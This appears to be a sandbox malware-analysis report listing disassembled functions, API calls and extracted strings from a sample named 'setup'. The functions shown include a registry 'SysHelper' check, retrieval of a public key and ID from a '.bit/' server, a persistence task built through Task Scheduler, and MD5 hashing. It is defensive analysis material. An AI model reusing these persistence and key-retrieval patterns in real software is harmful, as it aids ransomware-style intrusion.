                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                • API String ID: 4174345323-1723836103
                • Opcode ID: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                • Opcode Fuzzy Hash: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 776 41e690-41e6d8 call 42f7c0 timeGetTime call 423f74 call 40c6a0 783 41e6e0-41e6e6 776->783 784 41e6f0-41e722 call 42b420 call 40c500 783->784 789 41e724-41e729 784->789 790 41e72e-41e772 InternetOpenW 784->790 793 41ea1f-41ea40 call 423cf0 789->793 791 41e774-41e776 790->791 792 41e778-41e77d 790->792 794 41e78f-41e7b8 call 415ae0 call 421c02 791->794 795 41e780-41e789 792->795 800 41ea42-41ea46 793->800 801 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 793->801 817 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 794->817 818 41e7be-41e7f7 call 414690 call 40dd40 794->818 795->795 797 41e78b-41e78d 795->797 797->794 803 41ee2a call 411b10 800->803 804 41ea4c-41ea61 SHGetFolderPathA 800->804 805 41eaef-41eb12 801->805 806 41eace 801->806 819 41ee2f-41ee3a 803->819 804->784 808 41ea67-41ea88 PathAppendA DeleteFileA 804->808 812 41eb14-41eb16 805->812 813 41eb18-41eb1f 805->813 809 41ead0-41ead8 806->809 808->784 815 41eaeb 809->815 816 41eada-41eae7 lstrlenA 809->816 820 41eb2b-41eb4f call 4156d0 call 412900 812->820 814 41eb22-41eb27 813->814 814->814 821 41eb29 814->821 815->805 816->809 824 41eae9 816->824 873 41e8f3-41e917 lstrcpyW 817->873 874 41e8e7-41e8f0 call 422587 817->874 840 41e7f9-41e7fe 818->840 841 41e86f-41e874 818->841 826 41ee4d-41ee82 call 40ef50 819->826 827 41ee3c-41ee3f 819->827 845 41eb51 820->845 846 41eb53-41eb66 lstrcpyW 820->846 821->820 824->805 838 41ee86-41ee8c 826->838 827->783 843 41ee92-41ee94 838->843 844 41ee8e-41ee90 838->844 847 41e800-41e809 call 422587 840->847 848 41e80c-41e827 840->848 841->817 854 41e876-41e87f call 422587 841->854 851 41ee97-41ee9c 843->851 850 41eea0-41eeaf call 413ea0 844->850 845->846 852 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 846->852 853 41eb68-41eb71 call 422587 846->853 847->848 856 41e842-41e848 848->856 857 41e829-41e82d 848->857 850->838 875 41eeb1-41eee3 call 40ef50 850->875 851->851 859 41ee9e 851->859 899 41ebe6-41ebea 852->899 900 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 852->900 853->852 854->817 866 41e84e-41e86c 856->866 865 41e82f-41e840 call 4205a0 857->865 857->866 859->850 865->866 866->841 880 41e943-41e97a InternetOpenUrlW InternetReadFile 873->880 881 41e919-41e920 873->881 874->873 895 41eee7-41eeed 875->895 884 41e9ec-41ea08 InternetCloseHandle * 2 880->884 885 41e97c-41e994 SHGetFolderPathA 880->885 881->880 887 41e922-41e92e 881->887 891 41ea16-41ea19 884->891 892 41ea0a-41ea13 call 422587 884->892 885->884 890 41e996-41e9c2 PathAppendA call 4220b6 885->890 893 41e930-41e935 887->893 894 41e937 887->894 890->884 913 41e9c4-41e9e4 lstrlenA call 422b02 call 423a38 890->913 891->793 892->891 896 41e93c-41e93d lstrcatW 893->896 894->896 897 41eef3-41eef5 895->897 898 41eeef-41eef1 895->898 896->880 904 41eef8-41eefd 897->904 903 41ef01-41ef10 call 413ea0 898->903 899->803 905 41ebf0-41ec11 SHGetFolderPathA 899->905 907 41ec99 900->907 908 41ecbf-41ecdd 900->908 903->895 925 41ef12-41ef4c call 413ff0 call 412900 903->925 904->904 910 41eeff 904->910 905->784 912 41ec17-41ec38 PathAppendA DeleteFileA 905->912 914 41eca0-41eca8 907->914 915 41ece3-41eced 908->915 916 41ecdf-41ece1 908->916 910->903 912->783 933 41e9e9 913->933 919 41ecbb 914->919 920 41ecaa-41ecb7 lstrlenA 914->920 922 41ecf0-41ecf5 915->922 921 41ecf9-41ed1b call 4156d0 call 412900 916->921 919->908 920->914 927 41ecb9 920->927 936 41ed1d 921->936 937 41ed1f-41ed35 lstrcpyW 921->937 922->922 923 41ecf7 922->923 923->921 941 41ef50-41ef68 lstrcpyW 925->941 942 41ef4e 925->942 927->908 933->884 936->937 939 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 937->939 940 41ed37-41ed40 call 422587 937->940 956 41edad-41edb6 lstrlenW 939->956 957 41edbc-41edc1 939->957 940->939 945 41ef76-41efb3 call 413ff0 call 412900 941->945 946 41ef6a-41ef73 call 422587 941->946 942->941 962 41efb5 945->962 963 41efb7-41efc6 lstrcpyW 945->963 946->945 956->957 959 41ee44-41ee48 956->959 960 41ee10-41ee12 957->960 961 41edc3-41ede4 SHGetFolderPathA 957->961 964 41f01a-41f030 959->964 966 41ee14-41ee1a call 420bed 960->966 967 41ee1d-41ee1f 960->967 961->784 965 41edea-41ee0b PathAppendA DeleteFileA 961->965 962->963 968 41efd4-41efe0 963->968 969 41efc8-41efd1 call 422587 963->969 965->783 966->967 967->803 971 41ee21-41ee27 call 420bed 967->971 973 41efe2-41efeb call 422587 968->973 974 41efee-41f008 968->974 969->968 971->803 973->974 975 41f016 974->975 976 41f00a-41f013 call 422587 974->976 975->964 976->975
                APIs
                • timeGetTime.WINMM(?,?,?,?,?,004CB3EC,000000FF), ref: 0041E6C0
                  • Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                  • Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                  • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                • lstrlenW.KERNEL32(?), ref: 0041EC3E
                • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                • lstrlenA.KERNEL32(?), ref: 0041EC93
                • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED2A
                • lstrlenA.KERNEL32(?), ref: 0041ED4B
                • _malloc.LIBCMT ref: 0041ED55
                • _memset.LIBCMT ref: 0041ED63
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED85
                • lstrlenW.KERNEL32(?), ref: 0041EDA3
                • lstrlenW.KERNEL32(?), ref: 0041EDAE
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                • DeleteFileA.KERNEL32(?), ref: 0041EE05
                • _free.LIBCMT ref: 0041EE15
                • _free.LIBCMT ref: 0041EE22
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EF61
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EFBF
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                • API String ID: 704684250-3586605218
                • Opcode ID: ae25c5ddc8ef10f8a112783dc4d752c96938f9fd09edfd8e61b4c4f2a006c5a5
                • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                • Opcode Fuzzy Hash: ae25c5ddc8ef10f8a112783dc4d752c96938f9fd09edfd8e61b4c4f2a006c5a5
                • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1213 40d240-40d274 CoInitialize 1214 40d276-40d278 1213->1214 1215 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 1213->1215 1216 40da8e-40da92 1214->1216 1222 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 1215->1222 1223 40da3c-40da44 CoUninitialize 1215->1223 1218 40da94-40da9c call 422587 1216->1218 1219 40da9f-40dab1 1216->1219 1218->1219 1230 40d3e2-40d3fe call 40b140 1222->1230 1231 40d3cc-40d3dd CoUninitialize 1222->1231 1225 40da69-40da6d 1223->1225 1226 40da7a-40da8a 1225->1226 1227 40da6f-40da77 call 422587 1225->1227 1226->1216 1227->1226 1236 40d400-40d402 1230->1236 1237 40d404 1230->1237 1231->1225 1238 40d406-40d424 call 40b1d0 1236->1238 1237->1238 1242 40d426-40d437 CoUninitialize 1238->1242 1243 40d43c-40d451 call 40b140 1238->1243 1242->1225 1247 40d453-40d455 1243->1247 1248 40d457 1243->1248 1249 40d459-40d494 call 40b1d0 1247->1249 1248->1249 1255 40d496-40d4a7 CoUninitialize 1249->1255 1256 40d4ac-40d4c2 1249->1256 1255->1225 1259 40d4c8-40d4dd call 40b140 1256->1259 1260 40da2a-40da37 1256->1260 1264 40d4e3 1259->1264 1265 40d4df-40d4e1 1259->1265 1260->1223 1266 40d4e5-40d508 call 40b1d0 1264->1266 1265->1266 1266->1260 1271 40d50e-40d524 1266->1271 1271->1260 1273 40d52a-40d542 1271->1273 1273->1260 1276 40d548-40d55e 1273->1276 1276->1260 1278 40d564-40d57c 1276->1278 1278->1260 1281 40d582-40d59b 1278->1281 1281->1260 1283 40d5a1-40d5b6 call 40b140 1281->1283 1286 40d5b8-40d5ba 1283->1286 1287 40d5bc 1283->1287 1288 40d5be-40d5e1 call 40b1d0 1286->1288 1287->1288 1288->1260 1293 40d5e7-40d5fd 1288->1293 1293->1260 1295 40d603-40d626 1293->1295 1295->1260 1298 40d62c-40d651 1295->1298 1298->1260 1301 40d657-40d666 1298->1301 1301->1260 1303 40d66c-40d681 call 40b140 1301->1303 1306 40d683-40d685 1303->1306 1307 40d687 1303->1307 1308 40d689-40d6a3 call 40b1d0 1306->1308 1307->1308 1308->1260 1312 40d6a9-40d6be call 40b140 1308->1312 1315 40d6c0-40d6c2 1312->1315 1316 40d6c4 1312->1316 1317 40d6c6-40d6e0 call 40b1d0 1315->1317 1316->1317 1317->1260 1321 40d6e6-40d6f4 1317->1321 1321->1260 1323 40d6fa-40d70f call 40b140 1321->1323 1326 40d711-40d713 1323->1326 1327 40d715 1323->1327 1328 40d717-40d731 call 40b1d0 1326->1328 1327->1328 1328->1260 1332 40d737-40d74c call 40b140 1328->1332 1335 40d752 1332->1335 1336 40d74e-40d750 1332->1336 1337 40d754-40d76e call 40b1d0 1335->1337 1336->1337 1337->1260 1341 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 1337->1341 1352 40d7d0 1341->1352 1353 40d7d2-40d7e3 call 40b140 1341->1353 1352->1353 1356 40d7e5-40d7e7 1353->1356 1357 40d7e9 1353->1357 1358 40d7eb-40d819 call 40b1d0 call 413210 1356->1358 1357->1358 1358->1260 1365 40d81f-40d835 1358->1365 1365->1260 1367 40d83b-40d85e 1365->1367 1367->1260 1370 40d864-40d889 1367->1370 1370->1260 1373 40d88f-40d8ab call 40b140 1370->1373 1376 40d8b1 1373->1376 1377 40d8ad-40d8af 1373->1377 1378 40d8b3-40d8cd call 40b1d0 1376->1378 1377->1378 1382 40d8dd-40d8f2 call 40b140 1378->1382 1383 40d8cf-40d8d8 1378->1383 1387 40d8f4-40d8f6 1382->1387 1388 40d8f8 1382->1388 1383->1260 1389 40d8fa-40d91d call 40b1d0 1387->1389 1388->1389 1389->1260 1394 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 1389->1394 1399 40d993 1394->1399 1400 40d98f-40d991 1394->1400 1401 40d995-40da0e call 40b1d0 VariantClear * 3 1399->1401 1400->1401 1405 40da10-40da27 call 42052a 1401->1405 1406 40da46-40da67 CoUninitialize 1401->1406 1405->1260 1406->1225
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040D26C
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                • VariantInit.OLEAUT32(?), ref: 0040D309
                • VariantInit.OLEAUT32(?), ref: 0040D322
                • VariantInit.OLEAUT32(?), ref: 0040D33B
                • VariantClear.OLEAUT32(?), ref: 0040D397
                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                • CoUninitialize.OLE32 ref: 0040D3D5
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                • API String ID: 2496729271-1738591096
                • Opcode ID: b8ab7d589f73d312f79920d7a0cb3d7c6b18c1700088b224534da19ee98a71f5
                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                • Opcode Fuzzy Hash: b8ab7d589f73d312f79920d7a0cb3d7c6b18c1700088b224534da19ee98a71f5
                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                Control-flow Graph

                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                • __CxxThrowException@8.LIBCMT ref: 00411026
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                • __CxxThrowException@8.LIBCMT ref: 00411051
                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                • __CxxThrowException@8.LIBCMT ref: 0041107A
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                • __CxxThrowException@8.LIBCMT ref: 004110AB
                • _memset.LIBCMT ref: 004110CA
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                • __CxxThrowException@8.LIBCMT ref: 004110F0
                • _malloc.LIBCMT ref: 00411100
                • _memset.LIBCMT ref: 0041110B
                • _sprintf.LIBCMT ref: 0041112E
                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                • String ID: %.2X
                • API String ID: 2451520719-213608013
                • Opcode ID: cffbae393b9c2034aaa015718cd028ffd9aba4d39295b0a39f2b934ffbce0a78
                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                • Opcode Fuzzy Hash: cffbae393b9c2034aaa015718cd028ffd9aba4d39295b0a39f2b934ffbce0a78
                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
                • _memmove.LIBCMT ref: 0040F9EA
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                • _memmove.LIBCMT ref: 0040FADA
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: fa7b139b44231cf9aecb31c260ca57e64f3a4d30fe1ac03559237b3eed44ed2e
                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                • Opcode Fuzzy Hash: fa7b139b44231cf9aecb31c260ca57e64f3a4d30fe1ac03559237b3eed44ed2e
                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1885 40e870-40e8d6 call 4156d0 CryptAcquireContextW 1888 40e8d8-40e8e4 call 430eca 1885->1888 1889 40e8e9-40e901 CryptCreateHash 1885->1889 1888->1889 1891 40e903-40e90f call 430eca 1889->1891 1892 40e914-40e930 CryptHashData 1889->1892 1891->1892 1894 40e932-40e93e call 430eca 1892->1894 1895 40e943-40e961 CryptGetHashParam 1892->1895 1894->1895 1897 40e963-40e96f call 430eca 1895->1897 1898 40e974-40e9a6 call 420be4 call 42b420 CryptGetHashParam 1895->1898 1897->1898 1904 40e9a8-40e9b4 call 430eca 1898->1904 1905 40e9b9-40e9bb 1898->1905 1904->1905 1907 40e9c0-40e9c3 1905->1907 1908 40ea10-40ea31 call 422110 CryptDestroyHash CryptReleaseContext 1907->1908 1909 40e9c5-40e9df call 4204a6 1907->1909 1916 40ea33-40ea3b call 422587 1908->1916 1917 40ea3e-40ea50 1908->1917 1914 40e9e1-40e9f0 call 413ea0 1909->1914 1915 40e9f2-40e9f5 1909->1915 1914->1907 1919 40e9f8-40e9fd 1915->1919 1916->1917 1919->1919 1923 40e9ff-40ea0e call 413ea0 1919->1923 1923->1907
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                • _memset.LIBCMT ref: 0040E98E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                • _sprintf.LIBCMT ref: 0040E9D3
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                • String ID: %.2X
                • API String ID: 1084002244-213608013
                • Opcode ID: 0020aaaefdb6c4dcb4bf3e2ceb4008ce88efa9caebdce230c40b083e7cee562a
                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                • Opcode Fuzzy Hash: 0020aaaefdb6c4dcb4bf3e2ceb4008ce88efa9caebdce230c40b083e7cee562a
                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1926 40eaa0-40eb09 call 4156d0 CryptAcquireContextW 1929 40eb0b-40eb17 call 430eca 1926->1929 1930 40eb1c-40eb34 CryptCreateHash 1926->1930 1929->1930 1932 40eb36-40eb42 call 430eca 1930->1932 1933 40eb47-40eb56 CryptHashData 1930->1933 1932->1933 1935 40eb58-40eb64 call 430eca 1933->1935 1936 40eb69-40eb87 CryptGetHashParam 1933->1936 1935->1936 1938 40eb89-40eb95 call 430eca 1936->1938 1939 40eb9a-40ebcc call 420be4 call 42b420 CryptGetHashParam 1936->1939 1938->1939 1945 40ebce-40ebda call 430eca 1939->1945 1946 40ebdf 1939->1946 1945->1946 1948 40ebe1-40ebe4 1946->1948 1949 40ebe6-40ec00 call 4204a6 1948->1949 1950 40ec38-40ec67 call 422110 CryptDestroyHash CryptReleaseContext 1948->1950 1955 40ec02-40ec11 call 413ea0 1949->1955 1956 40ec13-40ec19 1949->1956 1955->1948 1958 40ec20-40ec25 1956->1958 1958->1958 1960 40ec27-40ec36 call 413ea0 1958->1960 1960->1948
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                • _memset.LIBCMT ref: 0040EBB4
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                • _sprintf.LIBCMT ref: 0040EBF4
                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                • String ID: %.2X
                • API String ID: 1637485200-213608013
                • Opcode ID: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                • Opcode Fuzzy Hash: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
